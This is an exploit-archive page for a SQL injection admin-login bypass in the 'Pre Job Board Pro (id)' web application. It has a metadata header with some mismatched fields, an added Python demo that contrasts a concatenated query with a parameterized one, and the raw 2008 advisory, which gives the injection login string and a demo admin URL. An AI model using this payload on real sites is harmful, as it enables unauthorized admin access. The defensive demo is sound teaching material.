vendor: Job Board Pro (id)
by: Maghribi WnaftakhaR
CVSS: 9.3 HIGH
Remote Admin Bypass
CWE: 287
Product Name: Job Board Pro (id)
Affected Version From: Job Board Pro (id)
Affected Version To: Job Board Pro (id)
Patch Exists: YES
Related CWE: CVE-2013-2245
CPE: cpe:a:preproject:job_board_pro_(id)
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2013

Pre Job Board Pro (id) Remote Admin Bypass Vulnerability

Pre Job Board Pro (id) is vulnerable to a remote admin bypass that allows an attacker to gain access to the admin panel without authentication. The cause is a lack of authentication check in the admin panel. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Upgrade to the latest version of Pre Job Board Pro (id).
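
The login values quoted in the raw advisory have the shape of SQL injection against a login query built by string concatenation. The following added example is not the product's code, which this page does not show: it assumes such a query and a MySQL-style backend that ignores trailing spaces in string comparisons (emulated with SQLite's `COLLATE RTRIM`), and the table, function names and stored credential are constructed.

```python
import hashlib
import hmac
import os
import sqlite3


def kdf(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    # Assumption: COLLATE RTRIM stands in for a MySQL PAD SPACE collation,
    # under which 'admin' = 'admin ' compares equal.
    db.execute("CREATE TABLE admins (username TEXT COLLATE RTRIM, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    secret = "constructed-Secret-1"  # constructed sample credential
    # 'password' is the plaintext column the legacy-style query expects;
    # the hardened path uses only salt and pw_hash.
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", secret, salt, kdf(secret, salt)))
    return db


def login_vulnerable(db, username: str, password: str) -> bool:
    # Input is pasted into the SQL text, so quotes in it become SQL syntax.
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username: str, password: str) -> bool:
    # Bound parameter: the value is passed as data and is never parsed as SQL.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(kdf(password, row[0]), row[1])


if __name__ == "__main__":
    db = make_db()
    user, pw = "admin ' or ' 1=1", "Cyber-Zone"  # login values from the advisory
    print("concatenated query accepts it:", login_vulnerable(db, user, pw))
    print("parameterized query accepts it:", login_hardened(db, user, pw))
```

With the concatenated query the `OR` splits the `WHERE` clause, so the password comparison no longer gates the result; with the bound parameter the same input is just a username that matches no row.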

Exploit-DB raw data:

*********************************************************************************************        
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=              Pre Job Board Pro (id) Remote Admin Bypass Vulnerability                     =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  Discovered By : Cyber-Zone                                         =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://preproject.com


Bypass :

Go To Admin Panel :

Login With this information :

Admin : admin ' or ' 1=1
pass  : Cyber-Zone or anything

Logged in :)

Live demo :

http://preproject.com/jobdemo/siteadmin/index.php

EnjoY


---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
-=                                                                                         =-
-=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

# milw0rm.com [2008-11-05]